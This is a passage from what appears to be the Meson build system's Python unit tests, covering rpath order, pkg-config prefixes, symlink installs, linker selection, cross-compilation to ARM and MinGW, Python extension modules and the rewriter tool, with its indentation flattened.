Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.common_test_dir, '201 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
as LD_LIBRARY_PATH, etc, so this test is skipped.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not (is_osx() or is_linux()):
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
if not is_osx():
# Rest of the workflow only works on macOS
return
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
@skipIfNoPkgconfig
def test_usage_pkgconfig_prefixes(self):
'''
Build and install two external libraries, to different prefixes,
then build and install a client program that finds them via pkgconfig,
and verify the installed client program runs.
'''
oldinstalldir = self.installdir
# Build and install both external libraries without DESTDIR
val1dir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'val1')
val1prefix = os.path.join(oldinstalldir, 'val1')
self.prefix = val1prefix
self.installdir = val1prefix
self.init(val1dir)
self.build()
self.install(use_destdir=False)
self.new_builddir()
env1 = {}
env1['PKG_CONFIG_PATH'] = os.path.join(val1prefix, self.libdir, 'pkgconfig')
val2dir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'val2')
val2prefix = os.path.join(oldinstalldir, 'val2')
self.prefix = val2prefix
self.installdir = val2prefix
self.init(val2dir, override_envvars=env1)
self.build()
self.install(use_destdir=False)
self.new_builddir()
# Build, install, and run the client program
env2 = {}
env2['PKG_CONFIG_PATH'] = os.path.join(val2prefix, self.libdir, 'pkgconfig')
testdir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'client')
testprefix = os.path.join(oldinstalldir, 'client')
self.prefix = testprefix
self.installdir = testprefix
self.init(testdir, override_envvars=env2)
self.build()
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'client')
env3 = {}
if is_cygwin():
env3['PATH'] = os.path.join(val1prefix, 'bin') + \
os.pathsep + \
os.path.join(val2prefix, 'bin') + \
os.pathsep + os.environ['PATH']
out = self._run([prog], override_envvars=env3).strip()
# Expected output is val1 + val2 = 3
self.assertEqual(out, '3')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
with chdir(subdir):
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
linker = cc.linker
if not linker.export_dynamic_args(env):
raise unittest.SkipTest('Not applicable for linkers without --export-dynamic')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
# Assert that
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
nativefile = tempfile.NamedTemporaryFile(mode='w')
nativefile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'build_wrapper.py')))
nativefile.flush()
self.meson_native_file = nativefile.name
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir)
def test_identity_cross_env(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
env = {
'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"',
}
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '68 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
# Test that installed libraries works
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '68 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
if is_sunos():
raise unittest.SkipTest('Solaris currently cannot override the linker.')
if not shutil.which(check):
raise unittest.SkipTest('Could not find {}.'.format(check))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
if lang != 'rust' and comp.use_linker_args('bfd') == []:
raise unittest.SkipTest(
'Compiler {} does not support using alternative linkers'.format(comp.id))
self.assertEqual(comp.linker.id, expected)
def test_ld_environment_variable_bfd(self):
self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd')
def test_ld_environment_variable_gold(self):
self._check_ld('ld.gold', 'gold', 'c', 'ld.gold')
def test_ld_environment_variable_lld(self):
self._check_ld('ld.lld', 'lld', 'c', 'ld.lld')
@skip_if_not_language('rust')
def test_ld_environment_variable_rust(self):
self._check_ld('ld.gold', 'gold', 'rust', 'ld.gold')
def test_ld_environment_variable_cpp(self):
self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold')
@skip_if_not_language('objc')
def test_ld_environment_variable_objc(self):
self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold')
@skip_if_not_language('objcpp')
def test_ld_environment_variable_objcpp(self):
self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold')
@skip_if_not_language('fortran')
def test_ld_environment_variable_fortran(self):
self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold')
@skip_if_not_language('d')
def test_ld_environment_variable_d(self):
# At least for me, ldc defaults to gold, and gdc defaults to bfd, so
# let's pick lld, which isn't the default for either (currently)
self._check_ld('ld.lld', 'lld', 'd', 'ld.lld')
def compute_sha256(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha256(f.read()).hexdigest()
def test_wrap_with_file_url(self):
testdir = os.path.join(self.unit_test_dir, '74 wrap file url')
source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
source_hash = self.compute_sha256(source_filename)
patch_hash = self.compute_sha256(patch_filename)
wrap = textwrap.dedent("""\
[wrap-file]
directory = foo
source_url = http://server.invalid/foo
source_fallback_url = file://{}
source_filename = foo.tar.xz
source_hash = {}
patch_url = http://server.invalid/foo
patch_fallback_url = file://{}
patch_filename = foo-patch.tar.xz
patch_hash = {}
""".format(source_filename, source_hash, patch_filename, patch_hash))
with open(wrap_filename, 'w') as f:
f.write(wrap)
self.init(testdir)
self.build()
self.run_tests()
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
os.unlink(wrap_filename)
def test_no_rpath_for_static(self):
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
self.build()
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertIsNone(build_rpath)
class BaseLinuxCrossTests(BasePlatformTests):
# Don't pass --libdir when cross-compiling. We have tests that
# check whether meson auto-detects it correctly.
libdir = None
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
self.assertTrue(False, 'Option libdir not in introspect data.')
def test_cross_libdir_subproject(self):
# Guard against a regression where calling "subproject"
# would reset the value of libdir to its default value.
testdir = os.path.join(self.unit_test_dir, '76 subdir libdir')
self.init(testdir, extra_args=['--libdir=fuf'])
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'fuf')
return
self.assertTrue(False, 'Libdir specified on command line gets reset.')
def test_std_remains(self):
# C_std defined in project options must be in effect also when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
# When specifying a known name, (python2 / python3) the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
# python2 is not necessarily installed on the test machine,
# if it is not, or the python headers can't be found, the test
# will raise MESON_SKIP_TEST, we could check beforehand what version
# of python is available, but it's a bit of a chicken and egg situation,
# as that is the job of the module, so we just ask for forgiveness rather
# than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
# Same as above, pypy2 and pypy3 are not expected to be present
# on the test system, the test project only raises in these cases
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_tatrget_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
